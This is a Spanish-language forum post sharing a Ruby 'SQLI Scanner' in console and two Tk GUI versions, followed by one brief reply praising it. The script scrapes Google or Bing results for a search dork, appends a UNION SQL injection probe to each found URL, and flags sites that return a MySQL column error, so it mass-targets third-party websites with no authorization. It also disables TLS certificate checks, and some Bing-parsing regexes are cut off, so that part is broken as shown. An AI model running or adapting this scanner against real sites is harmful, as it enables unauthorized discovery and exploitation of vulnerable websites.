Ruby [Ruby] SQLI Scanner 0.4

[Doddy]

Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing.

Version consola :

>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
begin
	return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
	return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
	headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
	uri = URI(web)
	http = Net::HTTP.new(uri.host, uri.port)
	return http.post(uri.path,arg, headers).body
rescue
	return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
	if page=~/(.*)=(.*)/
		parte1 = $1
		parte2 = $2
		final = parte1 + "="
		finales.push(final)
	end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10
	code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
	paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
	paginas.flatten.each do |pagina|
		partes = pagina
		if partes=~/url\?q=(.*)&sa/
			parte = $1
			link = URI::decode(parte)
			links.push(link)
		end
	end
	end
	links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
	contador+=10
	url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
	code = toma_ssl(url)
	links = URI::extract(code)
	links.each do |link|
		if link=~/cache:(.*?):(.*?)\+/
			link_final = "http://"+$2
			link_final = URI::decode(link_final)
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10

	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

def uso 
print "\n[+] Sintax : ruby scanner.rb   \n\n"
print "-search_bing : Find in Bing\n"
print "-search_google : Find in Google\n"
print "-scan_bing : Find SQLI in Bing\n"
print "-scan_google : Find SQLI in Google\n"
print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

def  head
print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]

head()

if !opcion or !dork or !pages
uso()
else

if opcion=="-search_bing"
	
	print "\n[+] Searching in Bing ...\n\n"
	
	links = bing(dork,pages)

	print "[+] Pages Count : "+links.count.to_s+"\n\n"

	if links.count.to_s=="0"
		print "[-] Links not found\n"
	end

	links.flatten.each do |link|
		print "[+] Link : "+link+"\n"
	end

	print "\n[+] Finished\n"

elsif opcion=="-search_google"
	
	print "\n[+] Searching in Google ...\n\n"
	
	links = google(dork,pages)

	if links.count.to_s=="0"
		print "[+] Searching in Google again ...\n\n"
		links = google_recursive(dork,pages)
	end

	print "[+] Pages Count : "+links.count.to_s

	if links.count.to_s=="0"
		print "[-] Links not found"
	end

	links.flatten.each do |link|
		print "[+] Link : "+link+"\n"
	end
	
	print "\n[+] Finished\n"

elsif opcion=="-scan_bing"
	
	print "\n[+] Searching in Bing ...\n\n"
	
	links = cortar(bing(dork,pages))

	print "[+] Pages Count : "+links.count.to_s+"\n\n"

	if links.count.to_s=="0"
		print "[-] Links not found\n"
	end

	links.flatten.each do |link|
		print "[+] Link : "+link
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				print " [OK]\n\a\a"
			else
				print " [FAIL]\n"
			end
		rescue
			print " [FAIL]\n"
		end
	end

	print "\n[+] Finished\n"
	
elsif opcion=="-scan_google"
	
	print "\n[+] Searching in Google ...\n\n"
	
	links = cortar(google(dork,pages))

	if links.count.to_s=="0"
		print "[+] Searching in Google again ...\n\n"
		links = cortar(google_recursive(dork,pages))
	end

	print "[+] Pages Count : "+links.count.to_s+"\n\n"

	if links.count.to_s=="0"
		print "[-] Links not found"
	end

	links.flatten.each do |link|
		print "[+] Link : "+link
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				print " [OK]\n\a\a"
			else
				print " [FAIL]\n"
			end
		rescue
			print " [FAIL]\n"
		end
	end

	print "\n[+] Finished\n"
else
	print "[-] Bad Option"
end
end

copyright()


#The End ?

Version Tk para Google :

>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
begin
	return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
	return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
	headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
	uri = URI(web)
	http = Net::HTTP.new(uri.host, uri.port)
	return http.post(uri.path,arg, headers).body
rescue
	return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
	if page=~/(.*)=(.*)/
		parte1 = $1
		parte2 = $2
		final = parte1 + "="
		finales.push(final)
	end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10
	code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
	paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
	paginas.flatten.each do |pagina|
		partes = pagina
		if partes=~/url\?q=(.*)&sa/
			parte = $1
			link = URI::decode(parte)
			links.push(link)
		end
	end
	end
	links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
	contador+=10
	url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
	code = toma_ssl(url)
	links = URI::extract(code)
	links.each do |link|
		if link=~/cache:(.*?):(.*?)\+/
			link_final = "http://"+$2
			link_final = URI::decode(link_final)
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10

	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
   background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

	dork = dork.value.to_s
	pages = pages.value.to_s

	console.insert("end",  "[+] Searching in Google ...\n\n")
	
	links = cortar(google(dork,pages))

	if links.count.to_s=="0"
		console.insert("end",  "[+] Searching in Google again ...\n\n")
		links = cortar(google_recursive(dork,pages))
	end

	console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

	if links.count.to_s=="0"
		console.insert("end", "[-] Links not found")
	end

	links.flatten.each do |link|
		console.insert("end", "[+] Link : "+link)
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				console.insert("end"," [OK]\n\a\a")
			else
				console.insert("end"," [FAIL]\n")
			end
		rescue
			console.insert("end", " [FAIL]\n")
		end
	end
	
	console.insert("end",  "\n[+] Finished")
	
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?

Una imagen :

Version Tk para Bing :

>
#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions 

def toma(web)
begin
	return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
	return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE 
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
	headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
	uri = URI(web)
	http = Net::HTTP.new(uri.host, uri.port)
	return http.post(uri.path,arg, headers).body
rescue
	return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
	if page=~/(.*)=(.*)/
		parte1 = $1
		parte2 = $2
		final = parte1 + "="
		finales.push(final)
	end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10
	code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
	paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
	paginas.flatten.each do |pagina|
		partes = pagina
		if partes=~/url\?q=(.*)&sa/
			parte = $1
			link = URI::decode(parte)
			links.push(link)
		end
	end
	end
	links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
	contador+=10
	url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
	code = toma_ssl(url)
	links = URI::extract(code)
	links.each do |link|
		if link=~/cache:(.*?):(.*?)\+/
			link_final = "http://"+$2
			link_final = URI::decode(link_final)
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
	contador+=10

	code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end

	links = code.scan(/
	links.flatten.each do |link|
		link_final = URI::decode(link)
		if not link_final=~/http:\/\/778802\.r\.msn\.com\//
			guardo.push(link_final)
		end
	end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
   background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

	dork = dork.value.to_s
	pages = pages.value.to_s

	console.insert("end", "[+] Searching in Bing ...\n\n")
	
	links = cortar(bing(dork,pages))

	console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

	if links.count.to_s=="0"
		console.insert("end","[-] Links not found\n")
	end

	links.flatten.each do |link|
		console.insert("end", "[+] Link : "+link)
		begin
			url = toma(link + "-1+union+select+1--")
			if url=~/The used SELECT statements have a different number of columns/
				console.insert("end"," [OK]\n\a\a")
			else
				console.insert("end", " [FAIL]\n")
			end
		rescue
			console.insert("end"," [FAIL]\n")
		end
	end
	
	console.insert("end",  "\n[+] Finished")
	
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?

Una imagen :

Eso es todo.

 

[rayane888]

Re: [Ruby] SQLI Scanner 0.4

Nice one Codder